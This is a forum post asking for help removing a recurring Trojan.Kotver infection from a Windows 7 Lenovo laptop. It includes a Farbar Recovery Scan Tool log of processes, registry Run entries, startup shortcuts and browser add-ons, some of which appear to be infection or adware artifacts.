Trojan.Kotver Infection

Hello,

I have a Lenovo laptop running Windows 7 that is infected with Trojan.Kotver. The infection was found by Norton Security. It removed the files but the infection keeps coming back.

I downloaded and ran FRST64 on the machine. The FRST.txt and Addition.txt file contents are below. Can someone please help me clean the laptop of the infection?

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 16-10-2016

Ran by Dwight (administrator) on DWIGHT-THINK (17-10-2016 15:23:55)

Running from C:\Users\Dwight\Downloads

Loaded Profiles: Dwight (Available Profiles: Dwight)

Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)

Internet Explorer Version 10 (Default browser: IE)

Boot Mode: Normal

Thanks.

======================= Start FRST.txt =================================

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 16-10-2016

Ran by Dwight (administrator) on DWIGHT-THINK (17-10-2016 15:23:55)

Running from C:\Users\Dwight\Downloads

Loaded Profiles: Dwight (Available Profiles: Dwight)

Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)

Internet Explorer Version 10 (Default browser: IE)

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Lenovo.) C:\Windows\System32\ibmpmsvc.exe

(Microsoft Corporation) C:\Windows\System32\wlanext.exe

(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcPrfMgrSvc.exe

(Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe

(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe

(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe

(Microsoft Corporation) C:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe

(Lenovo) C:\Program Files (x86)\Lenovo\RapidBoot HDD Accelerator\FBService.exe

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe

(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcDeskBandHlpr.exe

(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\CamMute.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\vcamsvc.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\lvvsst.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\virtscrl.exe

(Microsoft Corporation) C:\UPS\WSTD\MSSQL.1\MSSQL\Binn\sqlservr.exe

(Nitro PDF Software) C:\Program Files\Common Files\Nitro\Pro\8.0\NitroPDFDriverService8x64.exe

(Nalpeiron Ltd.) C:\Windows\SysWOW64\NLSSRV32.EXE

(Symantec Corporation) C:\Program Files (x86)\Norton Security with Backup\Engine\22.8.0.50\nsbu.exe

(Sony Corporation) C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe

(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe

(Conexant Systems, Inc.) C:\Windows\SysWOW64\SASrv.exe

() C:\Windows\SysWOW64\ScsiAccess.EXE

(Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe

(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlkd.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlk.exe

(Symantec Corporation) C:\Program Files (x86)\Norton Security with Backup\Engine\22.8.0.50\nsbu.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE

(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE

(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe

(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcSvc.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\micmute.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tphkload.exe

(Intel Corporation) C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe

(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvc.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPONSCR.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe

(Intel Corporation) C:\Windows\System32\hkcmd.exe

(Intel Corporation) C:\Windows\System32\igfxpers.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\BleServicesCtrl.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\CAudioFilterAgent64.exe

() C:\Program Files\CONEXANT\ForteConfig\fmapp.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

(Lenovo.) C:\Windows\System32\TpShocks.exe

(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TpKnrres.exe

(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\SvcGuiHlpr.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe

() C:\Program Files (x86)\Kodak\KODAK Software Updater\7288971\Program\backWeb-7288971.exe

(United Parcel Service, Inc.) C:\UPS\WSTD\WSTDMessaging.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe

(Local Temperature, LLC) C:\Users\Dwight\AppData\Local\LocalTemperature\LocalTemperature.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Vimicro) C:\Program Files (x86)\USB Camera\VM331STI.EXE

(Dolby Laboratories Inc.) C:\Program Files (x86)\Dolby Advanced Audio v2\pcee4.exe

(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe

() C:\UPS\WSTD\UPSNA1Msgr.exe

(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe

(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe

(Sony Corporation) C:\Program Files (x86)\Sony\PlayMemories Home\PMBVolumeWatcher.exe

(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe

(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE

(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe

(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe

(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe

(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\btplayerctrl.exe

(Lenovo) C:\Program Files (x86)\Lenovo\Message Center Plus\MCPLaunch.exe

(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe

(Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe

(Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe

(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Microsoft Corporation) C:\Windows\System32\cmd.exe

(Symantec Corporation) C:\Program Files (x86)\Norton Security with Backup\Engine\22.8.0.50\conathst.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [BLEServicesCtrl] => C:\Program Files (x86)\Intel\Bluetooth\BleServicesCtrl.exe [184112 2012-06-01] (Intel Corporation)

HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll [11586944 2012-06-18] (Motorola Solutions, Inc.)

HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1647616 2012-06-13] (Conexant Systems, Inc.)

HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe [887968 2012-06-14] (Conexant Systems, Inc.)

HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] ()

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3049200 2013-04-04] (Synaptics Incorporated)

HKLM\...\Run: [TpShocks] => C:\Windows\system32\TpShocks.exe [382248 2013-06-20] (Lenovo.)

HKLM\...\Run: [LENOVO.TPKNRRES] => C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe [293672 2013-06-14] (Lenovo Group Limited)

HKLM\...\Run: [AcWin7Hlpr] => C:\Program Files (x86)\Lenovo\Access Connections\AcTBenabler.exe [63784 2013-03-18] (Lenovo)

HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe [133440 2012-07-19] (Intel Corporation)

HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291648 2012-05-21] (Intel Corporation)

HKLM-x32\...\Run: [331BigDog] => C:\Program Files (x86)\USB Camera\VM331STI.EXE [548864 2013-03-11] (Vimicro)

HKLM-x32\...\Run: [Dolby Advanced Audio v2] => C:\Program Files (x86)\Dolby Advanced Audio v2\pcee4.exe [508656 2012-08-31] (Dolby Laboratories Inc.)

HKLM-x32\...\Run: [PWMTRV] => C:\Program Files (x86)\ThinkPad\Utilities\PWMTR64V.DLL [6002984 2013-06-26] (Lenovo Group Limited)

HKLM-x32\...\Run: [Lenovo Registration] => C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe /boot

HKLM-x32\...\Run: [Fastboot] => C:\Program Files (x86)\Lenovo\RapidBoot HDD Accelerator\FBConsole.exe [1085744 2012-11-21] (Lenovo)

HKLM-x32\...\Run: [NA1Messenger] => C:\UPS\WSTD\UPSNA1Msgr.exe [30744 2013-03-07] ()

HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)

HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2013-05-01] (Apple Inc.)

HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)

HKLM-x32\...\Run: [] => [X]

HKLM-x32\...\Run: [PMBVolumeWatcher] => C:\Program Files (x86)\Sony\PlayMemories Home\PMBVolumeWatcher.exe [2724432 2015-12-26] (Sony Corporation)

Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)

HKU\S-1-5-21-2430109965-1150345540-996092904-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8912088 2016-08-26] (Piriform Ltd)

HKU\S-1-5-21-2430109965-1150345540-996092904-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50599552 2016-02-10] (Skype Technologies S.A.)

HKU\S-1-5-21-2430109965-1150345540-996092904-1000\...\Run: [**ijralxruij<*>] => "C:\Users\Dwight\AppData\Local\20e01\f601d.lnk" <===== ATTENTION (Value Name with invalid characters)

HKU\S-1-5-21-2430109965-1150345540-996092904-1000\...\MountPoints2: {6f4be347-f9d9-11e2-96c0-806e6f6e6963} - Q:\LenovoQDrive.exe

HKU\S-1-5-21-2430109965-1150345540-996092904-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Bubbles.scr [899584 2010-11-20] (Microsoft Corporation)

Lsa: [Notification Packages] scecli ACGina

ShellIconOverlayIdentifiers: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security with Backup\Engine64\22.8.0.50\buShell.dll [2016-09-23] (Symantec Corporation)

ShellIconOverlayIdentifiers: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security with Backup\Engine64\22.8.0.50\buShell.dll [2016-09-23] (Symantec Corporation)

ShellIconOverlayIdentifiers: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security with Backup\Engine64\22.8.0.50\buShell.dll [2016-09-23] (Symantec Corporation)

ShellIconOverlayIdentifiers: [SugarSyncBackedUp] -> {0C4A258A-3F3B-4FFF-80A7-9B3BEC139472} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll [2012-09-19] (SugarSync, Inc.)

ShellIconOverlayIdentifiers: [SugarSyncPending] -> {62CCD8E3-9C21-41E1-B55E-1E26DFC68511} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll [2012-09-19] (SugarSync, Inc.)

ShellIconOverlayIdentifiers: [SugarSyncRoot] -> {A759AFF6-5851-457D-A540-F4ECED148351} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll [2012-09-19] (SugarSync, Inc.)

ShellIconOverlayIdentifiers: [SugarSyncShared] -> {1574C9EF-7D58-488F-B358-8B78C1538F51} => C:\Program Files (x86)\SugarSync\SugarSyncShellExt_x64.dll [2012-09-19] (SugarSync, Inc.)

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Kodak EasyShare software.lnk [2016-06-02]

ShortcutTarget: Kodak EasyShare software.lnk -> C:\Program Files (x86)\Kodak\Kodak EasyShare software\bin\EasyShare.exe (Eastman Kodak Company)

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\KODAK Software Updater.lnk [2016-06-02]

ShortcutTarget: KODAK Software Updater.lnk -> C:\Program Files (x86)\Kodak\KODAK Software Updater\7288971\Program\backWeb-7288971.exe ()

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk [2013-08-11]

ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE (Microsoft Corporation)

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\UPS WorldShip Messaging Utility.lnk [2013-08-11]

ShortcutTarget: UPS WorldShip Messaging Utility.lnk -> C:\UPS\WSTD\WSTDMessaging.exe (United Parcel Service, Inc.)

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\UPS WorldShip PLD Reminder Utility.lnk [2013-08-11]

ShortcutTarget: UPS WorldShip PLD Reminder Utility.lnk -> C:\UPS\WSTD\wstdPldReminder.exe (UPS)

Startup: C:\Users\Dwight\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\914ef.lnk [2016-10-13]

ShortcutTarget: 914ef.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)

Startup: C:\Users\Dwight\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Local Temperature.lnk [2015-03-06]

ShortcutTarget: Local Temperature.lnk -> C:\Users\Dwight\AppData\Local\LocalTemperature\LocalTemperature.exe (Local Temperature, LLC)

Startup: C:\Users\Dwight\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - HP Photosmart 5520 series.lnk [2016-10-17]

ShortcutTarget: Monitor Ink Alerts - HP Photosmart 5520 series.lnk -> C:\Program Files\HP\HP Photosmart 5520 series\Bin\HPStatusBL.dll (Hewlett-Packard Co.)

Startup: C:\Users\Dwight\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - HP Photosmart 6510 series.lnk [2016-10-17]

ShortcutTarget: Monitor Ink Alerts - HP Photosmart 6510 series.lnk -> C:\Program Files\HP\HP Photosmart 6510 series\Bin\HPStatusBL.dll (Hewlett-Packard Co.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

Tcpip\..\Interfaces\{E17AA34A-BEA7-4657-976C-9A85E86CA26E}: [DhcpNameServer] 216.144.187.101 204.186.0.203 204.186.0.180

Tcpip\..\Interfaces\{E6772B46-AA67-42F6-B8B9-B1685FBD8095}: [DhcpNameServer] 192.168.1.1

Internet Explorer:

==================

HKU\S-1-5-21-2430109965-1150345540-996092904-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://lenovo13-comm.msn.com/

SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

SearchScopes: HKLM-x32 -> {63894242-d1a7-4235-a425-c124cb8f4633} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^BDG^xdm037^S12243^us&si=pconverter&ptb=E06BF1E1-C90A-4A4A-AF9E-C3BABBBEB99E&ind=2015030616&n=781aed58&psa=&st=sb&searchfor={searchTerms}

SearchScopes: HKU\S-1-5-21-2430109965-1150345540-996092904-1000 -> {63894242-d1a7-4235-a425-c124cb8f4633} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^BDG^xdm037^S12243^us&si=pconverter&ptb=E06BF1E1-C90A-4A4A-AF9E-C3BABBBEB99E&ind=2015030616&n=781aed58&psa=&st=sb&searchfor={searchTerms}

SearchScopes: HKU\S-1-5-21-2430109965-1150345540-996092904-1000 -> {91C27D44-A787-41A3-A6A3-5F17AD8320C5} URL = hxxp://www.bing.com/search?FORM=WLETDF&PC=WLEM&q={searchTerms}&src=IE-SearchBox

SearchScopes: HKU\S-1-5-21-2430109965-1150345540-996092904-1000 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxps://nortonsafe.search.ask.com/web?q={searchTerms}&o=APN11913&l=dis&prt=NSBU&chn=1000&geo=US&ver=22&locale=en_US&gct=kwd&qsrc=2869

BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security with Backup\Engine64\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)

BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)

BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-10-16] (Google Inc.)

BHO-x32: No Name -> {1af33c13-6c63-488c-9dea-17b0e7829de5} -> No File

BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security with Backup\Engine\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)

BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)

BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-10-16] (Google Inc.)

Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security with Backup\Engine64\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)

Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-10-16] (Google Inc.)

Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security with Backup\Engine\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)

Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-10-16] (Google Inc.)

Toolbar: HKU\S-1-5-21-2430109965-1150345540-996092904-1000 -> Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security with Backup\Engine64\22.8.0.50\coIEPlg.dll [2016-09-23] (Symantec Corporation)

Toolbar: HKU\S-1-5-21-2430109965-1150345540-996092904-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-10-16] (Google Inc.)

DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab

Handler-x32: http - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)

Handler-x32: http - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)

Handler-x32: https - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)

Handler-x32: https - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)

Handler-x32: ipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)

Handler-x32: msdaipp - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)

Handler-x32: msdaipp - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\PROGRA~2\COMMON~1\System\OLEDB~1\MSDAIPP.DLL [1999-12-02] (Microsoft Corporation)

FireFox:

========

FF DefaultProfile: jdd31m22.default

FF ProfilePath: C:\Users\Dwight\AppData\Roaming\Mozilla\Firefox\Profiles\jdd31m22.default [2016-10-17]

FF DefaultSearchEngine: Mozilla\Firefox\Profiles\jdd31m22.default -> Ask Web Search

FF DefaultSearchEngine.US: Mozilla\Firefox\Profiles\jdd31m22.default -> Ask Web Search

FF SelectedSearchEngine: Mozilla\Firefox\Profiles\jdd31m22.default -> Ask Web Search

FF Homepage: Mozilla\Firefox\Profiles\jdd31m22.default -> hxxp://hp.myway.com/mapsgalaxy/s17904/index.html?coId=3fb33ff143dd4b91b18bca6edef04174&subId=CJmwmvrv384CFQkfhgodB_wH6Q&ln=en&n=782afaac&ptb=32E07714-F767-4841-8DB1-182FE2A220E3&st=tab&p2=%5EUX%5Expu572%5ES17904%5Eus&si=CJmwmvrv384CFQkfhgodB_wH6Q

FF Keyword.URL: Mozilla\Firefox\Profiles\jdd31m22.default -> hxxp://search.tb.ask.com/search/GGmain.jhtml?st=kwd&ptb=1D678405-731A-432F-9849-C6A23238B5DF&n=781c23d8&ind=2015110104&p2=^BYU^xdm101^YYA^us&searchfor=

FF Extension: (MapsGalaxy) - C:\Users\Dwight\AppData\Roaming\Mozilla\Firefox\Profiles\jdd31m22.default\Extensions\[email protected] [2016-08-26]

FF Extension: (OnlineMapFinder) - C:\Users\Dwight\AppData\Roaming\Mozilla\Firefox\Profiles\jdd31m22.default\Extensions\[email protected] [2016-08-26]

FF Extension: (EasyDocMerge) - C:\Users\Dwight\AppData\Roaming\Mozilla\Firefox\Profiles\jdd31m22.default\Extensions\[email protected] [2015-12-03]

FF SearchPlugin: C:\Users\Dwight\AppData\Roaming\Mozilla\Firefox\Profiles\jdd31m22.default\searchplugins\ask-web-search.xml [2015-11-01]

FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NSBU_22.5.5.15\coFFAddon

FF Extension: (Norton Security Toolbar) - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NSBU_22.5.5.15\coFFAddon [2016-10-17]

FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NSBU_22.5.5.15\coFFAddon

FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_185.dll [2016-10-12] ()

FF Plugin: @microsoft.com/GENUINE -> disabled [No File]

FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)

FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_185.dll [2016-10-12] ()

FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)

FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)

FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]

FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)

FF Plugin-x32: @nitropdf.com/NitroPDF -> C:\Program Files (x86)\Nitro\Pro 8\npnitromozilla.dll [2013-03-12] (Nitro PDF)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-10-16] (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-10-16] (Google Inc.)

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-09-30] (Adobe Systems Inc.)

FF Plugin HKU\S-1-5-21-2430109965-1150345540-996092904-1000: intel.com/AppUp -> C:\Program Files (x86)\Intel\IntelAppStore\bin\npAppUp.dll [2013-03-25] (Intel)

FF Plugin HKU\S-1-5-21-2430109965-1150345540-996092904-1000: intel.com/AppUpx64 -> C:\Program Files (x86)\Intel\IntelAppStore\bin\npAppUp_x64.dll [2013-03-25] (Intel)

Chrome:

=======

CHR Profile: C:\Users\Dwight\AppData\Local\Google\Chrome\User Data\Default [2016-10-17]

CHR Extension: (Google Slides) - C:\Users\Dwight\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-10-17]

CHR Extension: (Google Docs) - C:\Users\Dwight\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-10-17]

CHR Extension: (Google Drive) - C:\Users\Dwight\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-10-17]

CHR Extension: (YouTube) - C:\Users\Dwight\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-10-17]

CHR Extension: (Norton Security Toolbar) - C:\Users\Dwight\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2016-10-17]

CHR Extension: (Google Sheets) - C:\Users\Dwight\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-10-17]

CHR Extension: (Google Docs Offline) - C:\Users\Dwight\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-10-17]

